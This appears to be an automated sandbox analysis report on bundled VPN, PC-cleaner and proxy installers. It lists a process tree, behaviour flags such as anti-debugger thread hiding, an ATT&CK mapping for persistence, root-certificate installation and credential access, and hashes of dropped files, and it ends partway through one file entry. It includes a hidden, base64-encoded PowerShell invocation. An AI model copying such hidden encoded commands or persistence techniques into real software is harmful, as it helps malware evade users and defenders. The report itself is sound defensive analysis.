C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1060 -ip 1060
1⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1060 -ip 1060
1⤵
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1060 -ip 1060
1⤵
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1060 -ip 1060
1⤵
PID:4744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1060 -ip 1060
1⤵
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1060 -ip 1060
1⤵
PID:320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1060 -ip 1060
1⤵
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1060 -ip 1060
1⤵
PID:2540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1060 -ip 1060
1⤵
PID:1580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1060 -ip 1060
1⤵
PID:2540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1060 -ip 1060
1⤵
PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1060 -ip 1060
1⤵
PID:5552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1060 -ip 1060
1⤵
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1060 -ip 1060
1⤵
PID:5972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1060 -ip 1060
1⤵
PID:6048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3948

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1060 -ip 1060
1⤵
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1060 -ip 1060
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1060 -ip 1060
1⤵
PID:5320

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 420 -p 4260 -ip 4260
1⤵
PID:5548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4260 -s 1132
1⤵
- Program crash
PID:5180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1060 -ip 1060
1⤵
PID:5740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1060 -ip 1060
1⤵
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1060 -ip 1060
1⤵
PID:5012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:3424

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1a1ee158-7bb2-5040-8c04-15dde7f91936}\oemvista.inf" "9" "4d14a44ff" "0000000000000148" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:612

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"
2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1060 -ip 1060
1⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1060 -ip 1060
1⤵
PID:940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
1⤵
PID:6112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1060 -ip 1060
1⤵
PID:4456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1060 -ip 1060
1⤵
PID:3128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1060 -ip 1060
1⤵
PID:2028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1060 -ip 1060
1⤵
PID:424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1060 -ip 1060
1⤵
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1060 -ip 1060
1⤵
PID:5488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1060 -ip 1060
1⤵
PID:5680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4708

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5976

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:5960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1060 -ip 1060
1⤵
PID:5708

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Security Software Discovery

T1063

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Data Recovery\rdrhfsp.exe
Filesize
2.0MB

MD5
340a6bccd7a74014c0c9a33706a7ddc3

SHA1
b8d658387782a63ecc24a62161efe0cb469afdc3

SHA256
204a2174852b19c1122e6af5c8d81fc976f231064e4a645a8115ee8ed3f00ba1

SHA512
cffd0f6153ee5095993496e3e7c5cddba18b043198c3da15cb1c8a50d718d513a748698494131f22552e1ec4cbc847f8c709ef72a898a9cee1b0bc091732752a

Download Submit
C:\Program Files (x86)\Data Recovery\rdrhfsp.exe
Filesize
2.0MB

MD5
340a6bccd7a74014c0c9a33706a7ddc3

SHA1
b8d658387782a63ecc24a62161efe0cb469afdc3

SHA256
204a2174852b19c1122e6af5c8d81fc976f231064e4a645a8115ee8ed3f00ba1

SHA512
cffd0f6153ee5095993496e3e7c5cddba18b043198c3da15cb1c8a50d718d513a748698494131f22552e1ec4cbc847f8c709ef72a898a9cee1b0bc091732752a

Download Submit
C:\Program Files (x86)\MaskVPN\driver\win764\OemVista.inf
Filesize
7KB

MD5
87868193626dc756d10885f46d76f42e

SHA1
94a5ce8ed7633ed77531b6cb14ceb1927c5cae1f

SHA256
b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41

SHA512
79751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277

Download Submit
C:\Program Files (x86)\MaskVPN\driver\win764\install.bat
Filesize
91B

MD5
3a05ce392d84463b43858e26c48f9cbf

SHA1
78f624e2c81c3d745a45477d61749b8452c129f1

SHA256
5b56d8b121fc9a7f2d4e90edb1b29373cd2d06bac1c54ada8f6cb559b411180b

SHA512
8a31fda09f0fa7779c4fb0c0629d4d446957c8aaae0595759dd2b434e84a17ecb6ffe4beff973a245caf0452a0c04a488d2ae7b232d8559f3bd1bfd68fed7cf1

Download Submit
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
Filesize
90KB

MD5
d10f74d86cd350732657f542df533f82

SHA1
c54074f8f162a780819175e7169c43f6706ad46c

SHA256
c9963a3f8abf6fedc8f983a9655a387d67c752bd59b0d16fd6fc2396b4b4ca67

SHA512
0d7cb060e4a9482d4862ff47c9d6f52a060c4fb4e3b8388769fa2974ccf081af6bea7b1d4325c03d128bc4de6e0525d6e9bf3a42564391f2acd980435a0dd87e

Download Submit
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
Filesize
90KB

MD5
d10f74d86cd350732657f542df533f82

SHA1
c54074f8f162a780819175e7169c43f6706ad46c

SHA256
c9963a3f8abf6fedc8f983a9655a387d67c752bd59b0d16fd6fc2396b4b4ca67

SHA512
0d7cb060e4a9482d4862ff47c9d6f52a060c4fb4e3b8388769fa2974ccf081af6bea7b1d4325c03d128bc4de6e0525d6e9bf3a42564391f2acd980435a0dd87e

Download Submit
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
Filesize
90KB

MD5
d10f74d86cd350732657f542df533f82

SHA1
c54074f8f162a780819175e7169c43f6706ad46c

SHA256
c9963a3f8abf6fedc8f983a9655a387d67c752bd59b0d16fd6fc2396b4b4ca67

SHA512
0d7cb060e4a9482d4862ff47c9d6f52a060c4fb4e3b8388769fa2974ccf081af6bea7b1d4325c03d128bc4de6e0525d6e9bf3a42564391f2acd980435a0dd87e

Download Submit
C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat
Filesize
31B

MD5
9133a44bfd841b8849bddead9957c2c3

SHA1
3c1d92aa3f6247a2e7ceeaf0b811cf584ae87591

SHA256
b8109f63a788470925ea267f1b6032bba281b1ac3afdf0c56412cb753df58392

SHA512
d7f5f99325b9c77939735df3a61097a24613f85e7acc2d84875f78f60b0b70e3504f34d9fff222c593e1daadd9db71080a23b588fe7009ce93b5a4cbe9785545

Download Submit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
Filesize
7.1MB

MD5
c6b1934d3e588271f27a38bfeed42abb

SHA1
08072ecb9042e6f7383d118c78d45b42a418864f

SHA256
35ec7f4d10493f28d582440719e6f622d9a2a102e40a0bc7c4924a3635a7f5a8

SHA512
1db865c5fee202b825888a8eb6a202100e57fe2192baf08e47bc8e6bf68c7fe78b4b16aa7700d8655d1be8494eb6fd69103d706c52372b07c7c6ab415ba29692

Download Submit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
Filesize
7.1MB

MD5
c6b1934d3e588271f27a38bfeed42abb

SHA1
08072ecb9042e6f7383d118c78d45b42a418864f

SHA256
35ec7f4d10493f28d582440719e6f622d9a2a102e40a0bc7c4924a3635a7f5a8

SHA512
1db865c5fee202b825888a8eb6a202100e57fe2192baf08e47bc8e6bf68c7fe78b4b16aa7700d8655d1be8494eb6fd69103d706c52372b07c7c6ab415ba29692

Download Submit
C:\Program Files (x86)\Proxy2Service\client.exe
Filesize
4.0MB

MD5
429eb5fbd56e3664b0c9c37eef5949d9

SHA1
279c51c5c7444dd612b5260cbfd8a6f09b4f6519

SHA256
78f2a7ea4a289ca6a8ce0d451badbc98eeb67d0ee8bb94d4b58e3ef89b75a9bc

SHA512
fe41cd85798a7f78894bd18a53d7fb29f57bf4846b5ddfcdddfac3898b43bedb75f1b427935b34c0950680e4e528d7387dce8096abc1909661cd44b883ab8414

Download Submit
C:\Program Files (x86)\Proxy2Service\client.exe
Filesize
4.0MB

MD5
429eb5fbd56e3664b0c9c37eef5949d9

SHA1
279c51c5c7444dd612b5260cbfd8a6f09b4f6519

SHA256
78f2a7ea4a289ca6a8ce0d451badbc98eeb67d0ee8bb94d4b58e3ef89b75a9bc

SHA512
fe41cd85798a7f78894bd18a53d7fb29f57bf4846b5ddfcdddfac3898b43bedb75f1b427935b34c0950680e4e528d7387dce8096abc1909661cd44b883ab8414

Download Submit
C:\Program Files (x86)\Synes\PCCleaner\PCCleaner.exe
Filesize
6.6MB

MD5
b25f317a61be9e4f5da2f68fe38f5524

SHA1
9c3049cfcbfae618570bb001b87930a8e9febba3

SHA256
fb946c2fd9ed15457a5f848ffca82813551143a9e6e69567729af57753ed4fb7

SHA512
47cba9c833ba91cd87bfe071af817f90427a9fd2d269a3b3feef2f5034c44ee56fcc190cc389c1a65b2bc017aed16a6526dcbc92270517f6abefd2803ccefd51

Download Submit
C:\Program Files (x86)\Synes\PCCleaner\PCCleaner.exe
Filesize
6.6MB

MD5
b25f317a61be9e4f5da2f68fe38f5524

SHA1
9c3049cfcbfae618570bb001b87930a8e9febba3

SHA256
fb946c2fd9ed15457a5f848ffca82813551143a9e6e69567729af57753ed4fb7

SHA512
47cba9c833ba91cd87bfe071af817f90427a9fd2d269a3b3feef2f5034c44ee56fcc190cc389c1a65b2bc017aed16a6526dcbc92270517f6abefd2803ccefd51

Download Submit
C:\Program Files (x86)\Synes\PCCleaner\TurboSearch.exe
Filesize
943KB

MD5
242b4c7c12b77ecc8e507c7e762d64b2

SHA1
9315a8fbebeca55f2832b981f3be069e3cd4603e

SHA256
fb3432e0eb00dd2b6b389644f3539172c4e0edda091c59e2a12bd08e65149fe4

SHA512
5dacf949d2d0502cbcc17958198829e23137052cc53d781b9f80d599f1c01900f66e7c3564e1fc6c5d5eccfaf1f682d5af92aac0b75aa59640ea32e7acf28c6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
30KB

MD5
bba4b80ca1cf65a297b13749f0de6448

SHA1
26cf418e1987c1b3de1cb280cabc28735e9a6b19

SHA256
a5a074458d0ed2bf14d40bb29216c3f23290b76e20b33fc9f57e296a04c2f284

SHA512
ae37c4116862b51fbd8a424f2f71ef5c9bbe7068202d2f9ea341509e775436e6c25e8a82f7b7b8fb9464948de96329860518b2c025cf183d4477930963ccb8e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4cPtPB3\vpn.exe
Filesize
15.0MB

MD5
680171ae9ab5199fe9ce9dbfbd162151

SHA1
3b46435011e4d12f72d25f9e02e547c301bd347c

SHA256
4c06e3980d8861b5f308561858c629fc60cdd0ba029717ef929ae673f39a6819

SHA512
57a63a2920fb4c4849a256c9e196964923f59bcb0f059a5a7275ec5362a4eb0b8a47e26a2c5b879f3a7c94dbad4aaa0b24247580dd5262cf862ff4f4ee8237d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\C4cPtPB3\vpn.exe
Filesize
15.0MB

MD5
680171ae9ab5199fe9ce9dbfbd162151

SHA1
3b46435011e4d12f72d25f9e02e547c301bd347c

SHA256
4c06e3980d8861b5f308561858c629fc60cdd0ba029717ef929ae673f39a6819

SHA512
57a63a2920fb4c4849a256c9e196964923f59bcb0f059a5a7275ec5362a4eb0b8a47e26a2c5b879f3a7c94dbad4aaa0b24247580dd5262cf862ff4f4ee8237d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\CQlm2anS\yRsXtHTgGrW6NY8ct.exe
Filesize
5.3MB

MD5
36414b4e81fee529261e43d41a9b0812

SHA1
425e1134cd9658979051e3a4d1ed56eb02edd243

SHA256
7f481445193d2dc942e695ee9f2d9da1f82b7ee795f3ec5333d4411df354e726

SHA512
5a3a3d9a5faef42bc58b3e0067193bf700e1486517f43b8701ed9cf96360f2c0d582fcbc38c897ac23ffdb9c558c328929e8b686adc958cb0f71503230630ce1

Download Submit
C:\Users\Admin\AppData\Local\Temp\CQlm2anS\yRsXtHTgGrW6NY8ct.exe
Filesize
5.3MB

MD5
36414b4e81fee529261e43d41a9b0812

SHA1
425e1134cd9658979051e3a4d1ed56eb02edd243

SHA256
7f481445193d2dc942e695ee9f2d9da1f82b7ee795f3ec5333d4411df354e726

SHA512
5a3a3d9a5faef42bc58b3e0067193bf700e1486517f43b8701ed9cf96360f2c0d582fcbc38c897ac23ffdb9c558c328929e8b686adc958cb0f71503230630ce1

Download Submit
C:\Users\Admin\AppData\Local\Temp\HJKtqljk\aTMvS4.exe
Filesize
5.3MB

MD5
37c8fbeeeb72e66b591ecefa16bf7492

SHA1
fcdf877a19957d5f9e47ccbdeab76fdb5a58fcae

SHA256
6e5a00dd4ca5b5d4dcc64c44c2d928b38c9b3a665882b7e384daf0b7be3a1829

SHA512
fe36dd71ef48e51c2fd053d34acec07477c759d7283e4fb6d7619780b5fa4342fb8f4f1163afe6938aee569852251b0c456bc3e2b5462bc2a72e93e741dc9651

Download Submit
C:\Users\Admin\AppData\Local\Temp\HJKtqljk\aTMvS4.exe
Filesize
5.3MB

MD5
37c8fbeeeb72e66b591ecefa16bf7492

SHA1
fcdf877a19957d5f9e47ccbdeab76fdb5a58fcae

SHA256
6e5a00dd4ca5b5d4dcc64c44c2d928b38c9b3a665882b7e384daf0b7be3a1829

SHA512
fe36dd71ef48e51c2fd053d34acec07477c759d7283e4fb6d7619780b5fa4342fb8f4f1163afe6938aee569852251b0c456bc3e2b5462bc2a72e93e741dc9651

Download Submit
C:\Users\Admin\AppData\Local\Temp\OHdR3rwF\Loy6GQKfoZWtolK.exe
Filesize
6.4MB

MD5
bdc0d40823b53ffe93098a2160b55c05

SHA1
1bf6a4cbff39a6fd5c2beb64c60926ec073a32b0

SHA256
962d885475a4024a31bc2e248ed206b09e8f9adc936d43517860302bef3cf981

SHA512
dd0170ea94c3fe1b3cac32096118a1f4669973ca634b65afe218711a06fc36dbeaff2ab1ea1ede938619b12cc65d8ab0c1860e863199bb2aa59337669125a093

Download Submit
C:\Users\Admin\AppData\Local\Temp\OHdR3rwF\Loy6GQKfoZWtolK.exe
Filesize
6.4MB

MD5
bdc0d40823b53ffe93098a2160b55c05

SHA1
1bf6a4cbff39a6fd5c2beb64c60926ec073a32b0

SHA256
962d885475a4024a31bc2e248ed206b09e8f9adc936d43517860302bef3cf981

SHA512
dd0170ea94c3fe1b3cac32096118a1f4669973ca634b65afe218711a06fc36dbeaff2ab1ea1ede938619b12cc65d8ab0c1860e863199bb2aa59337669125a093

Download Submit
C:\Users\Admin\AppData\Local\Temp\PLQzp53w\z9lPVDj9zZUU2uf3mPY.exe
Filesize
943KB

MD5
d89f6743deeba9e246bf072b1ca5866c

SHA1
b54edf8e54f95a5a3d6fcece491a689f60cc0ce7

SHA256
bcbaef8e04b205ccc4b851ebf58499cc40d87a664bde227ef251b73346508b7e

SHA512
113463919931ad9cf6202ece4774b40eb57a78180911b80eeea24d0580e2490a7248998ed70bc5852a4846355ac1b856210f7709a941e457458a4eab0544c1b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-09F0L.tmp\is-HJLGP.tmp
Filesize
640KB

MD5
dc8d1cf9d84b149a16845e747fdf80be

SHA1
521a1d994e42110d42eba22728f52cc04f3a24c0

SHA256
dbcbca783b9ec1ae517d1f8f9de138ebf30f88e6293c481d21c80d7c49170885

SHA512
5afee4683c7348a7af891d17a2bf3525ff6b69c6ed3814a914679d7efad9d7ed62dced05cad1583e8d2627d922038a28abae021939aeeb4d3f31a4d326c827d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-09F0L.tmp\is-HJLGP.tmp
Filesize
640KB

MD5
dc8d1cf9d84b149a16845e747fdf80be

SHA1
521a1d994e42110d42eba22728f52cc04f3a24c0

SHA256
dbcbca783b9ec1ae517d1f8f9de138ebf30f88e6293c481d21c80d7c49170885

SHA512
5afee4683c7348a7af891d17a2bf3525ff6b69c6ed3814a914679d7efad9d7ed62dced05cad1583e8d2627d922038a28abae021939aeeb4d3f31a4d326c827d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4VQ7M.tmp\yRsXtHTgGrW6NY8ct.tmp
Filesize
2.9MB

MD5
b31352c9dc57321de6ba6cd2af92250b

SHA1
1027fc3794ddcfc6ca856741c0e627c6e9a2589c

SHA256
0cf726fcec8115ec1eb8dec3b9105cf1698ace535fce5dd52713d61f2cfa7e60

SHA512
8c9867161df30aba27d8226d81647e5b556a9120c5168e36ffabebcef8b60c4d47f661d228f8dbc419875266f334ab6dd5984120a6cef3c18a356ee647935db6

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4VQ7M.tmp\yRsXtHTgGrW6NY8ct.tmp
Filesize
2.9MB

MD5
b31352c9dc57321de6ba6cd2af92250b

SHA1
1027fc3794ddcfc6ca856741c0e627c6e9a2589c

SHA256
0cf726fcec8115ec1eb8dec3b9105cf1698ace535fce5dd52713d61f2cfa7e60

SHA512
8c9867161df30aba27d8226d81647e5b556a9120c5168e36ffabebcef8b60c4d47f661d228f8dbc419875266f334ab6dd5984120a6cef3c18a356ee647935db6

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-EM261.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F7SM1.tmp\is-F8424.tmp
Filesize
654KB

MD5
d37feaa731e8bb0f7b8e5f8e36cce89f

SHA1
6713e42f1ab574569fda6ef6ff25bda3ca4df350

SHA256
a1d729a928a87360a9d1f7cdb468f4287de8d31e7da43968be81703d572b221a

SHA512
09e640fe4f53b32e2351a81d8eb0e0092d9d92942329593cd22130d003859ab891199d37cf8e3ea8b5cf4eb8b873c6021af6ce78d9144606bab1c3c32ef68a74

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F7SM1.tmp\is-F8424.tmp
Filesize
654KB

MD5
d37feaa731e8bb0f7b8e5f8e36cce89f

SHA1
6713e42f1ab574569fda6ef6ff25bda3ca4df350

SHA256
a1d729a928a87360a9d1f7cdb468f4287de8d31e7da43968be81703d572b221a

SHA512
09e640fe4f53b32e2351a81d8eb0e0092d9d92942329593cd22130d003859ab891199d37cf8e3ea8b5cf4eb8b873c6021af6ce78d9144606bab1c3c32ef68a74

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\ApiTool.dll
Filesize
959KB

MD5
b5e330f90e1bab5e5ee8ccb04e679687

SHA1
3360a68276a528e4b651c9019b6159315c3acca8

SHA256
2900d536923740fe530891f481e35e37262db5283a4b98047fe5335eacaf3441

SHA512
41ab8f239cfff8e5ddcff95cdf2ae11499d57b2ebe8f0786757a200047fd022bfd6975be95e9cfcc17c405e631f069b9951591cf74faf3e6a548191e63a8439c

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\ApiTool.dll
Filesize
959KB

MD5
b5e330f90e1bab5e5ee8ccb04e679687

SHA1
3360a68276a528e4b651c9019b6159315c3acca8

SHA256
2900d536923740fe530891f481e35e37262db5283a4b98047fe5335eacaf3441

SHA512
41ab8f239cfff8e5ddcff95cdf2ae11499d57b2ebe8f0786757a200047fd022bfd6975be95e9cfcc17c405e631f069b9951591cf74faf3e6a548191e63a8439c

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\InnoCallback.dll
Filesize
63KB

MD5
1c55ae5ef9980e3b1028447da6105c75

SHA1
f85218e10e6aa23b2f5a3ed512895b437e41b45c

SHA256
6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f

SHA512
1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\InnoCallback.dll
Filesize
63KB

MD5
1c55ae5ef9980e3b1028447da6105c75

SHA1
f85218e10e6aa23b2f5a3ed512895b437e41b45c

SHA256
6afa2d104be6efe3d9a2ab96dbb75db31565dad64dd0b791e402ecc25529809f

SHA512
1ec4d52f49747b29cfd83e1a75fc6ae4101add68ada0b9add5770c10be6dffb004bb47d0854d50871ed8d77acf67d4e0445e97f0548a95c182e83b94ddf2eb6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\botva2.dll
Filesize
41KB

MD5
ef899fa243c07b7b82b3a45f6ec36771

SHA1
4a86313cc8766dcad1c2b00c2b8f9bbe0cf8bbbe

SHA256
da7d0368712ee419952eb2640a65a7f24e39fb7872442ed4d2ee847ec4cfde77

SHA512
3f98b5ad9adfad2111ebd1d8cbab9ae423d624d1668cc64c0bfcdbfedf30c1ce3ea6bc6bcf70f7dd1b01172a4349e7c84fb75d395ee5af73866574c1d734c6e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\botva2.dll
Filesize
41KB

MD5
ef899fa243c07b7b82b3a45f6ec36771

SHA1
4a86313cc8766dcad1c2b00c2b8f9bbe0cf8bbbe

SHA256
da7d0368712ee419952eb2640a65a7f24e39fb7872442ed4d2ee847ec4cfde77

SHA512
3f98b5ad9adfad2111ebd1d8cbab9ae423d624d1668cc64c0bfcdbfedf30c1ce3ea6bc6bcf70f7dd1b01172a4349e7c84fb75d395ee5af73866574c1d734c6e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\libMaskVPN.dll
Filesize
2.3MB

MD5
3d88c579199498b224033b6b66638fb8

SHA1
6f6303288e2206efbf18e4716095059fada96fc4

SHA256
5bccb86319fc90210d065648937725b14b43fa0c96f9da56d9984e027adebbc3

SHA512
9740c521ed38643201ed4c2574628454723b9213f12e193c11477e64a2c03daa58d2a48e70df1a7e9654c50a80049f3cf213fd01f2b74e585c3a86027db19ec9

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QOJ7Q.tmp\libMaskVPN.dll
Filesize
2.3MB

MD5
3d88c579199498b224033b6b66638fb8

SHA1
6f6303288e2206efbf18e4716095059fada96fc4

SHA256
5bccb86319fc90210d065648937725b14b43fa0c96f9da56d9984e027adebbc3

SHA512
9740c521ed38643201ed4c2574628454723b9213f12e193c11477e64a2c03daa58d2a48e70df1a7e9654c50a80049f3cf213fd01f2b74e585c3a86027db19ec9

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-R0QO0.tmp\vpn.tmp
Filesize
1.7MB

MD5
1f333c6805cdbb08ba98e322e1ec67d3

SHA1
073022dfc6333a334864cf7221ae06052e56a07e

SHA256
fa2f15abf0967512f8c7577fd314fd55bd7dd760eed7d626e7e36a0a18db12d5

SHA512
57b9dac3503f4b10c9c1e203bd53ee2b79b578ba0cb203e5325e5e198ef8a155ff7e96136c05a71b54616b1ebdbf63099a11edf8362aefde4bb3829fdae009ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-R0QO0.tmp\vpn.tmp
Filesize
1.7MB

MD5
1f333c6805cdbb08ba98e322e1ec67d3

SHA1
073022dfc6333a334864cf7221ae06052e56a07e

SHA256
fa2f15abf0967512f8c7577fd314fd55bd7dd760eed7d626e7e36a0a18db12d5

SHA512
57b9dac3503f4b10c9c1e203bd53ee2b79b578ba0cb203e5325e5e198ef8a155ff7e96136c05a71b54616b1ebdbf63099a11edf8362aefde4bb3829fdae009ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TAH8H.tmp\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TAH8H.tmp\_isdecmp.dll
Filesize
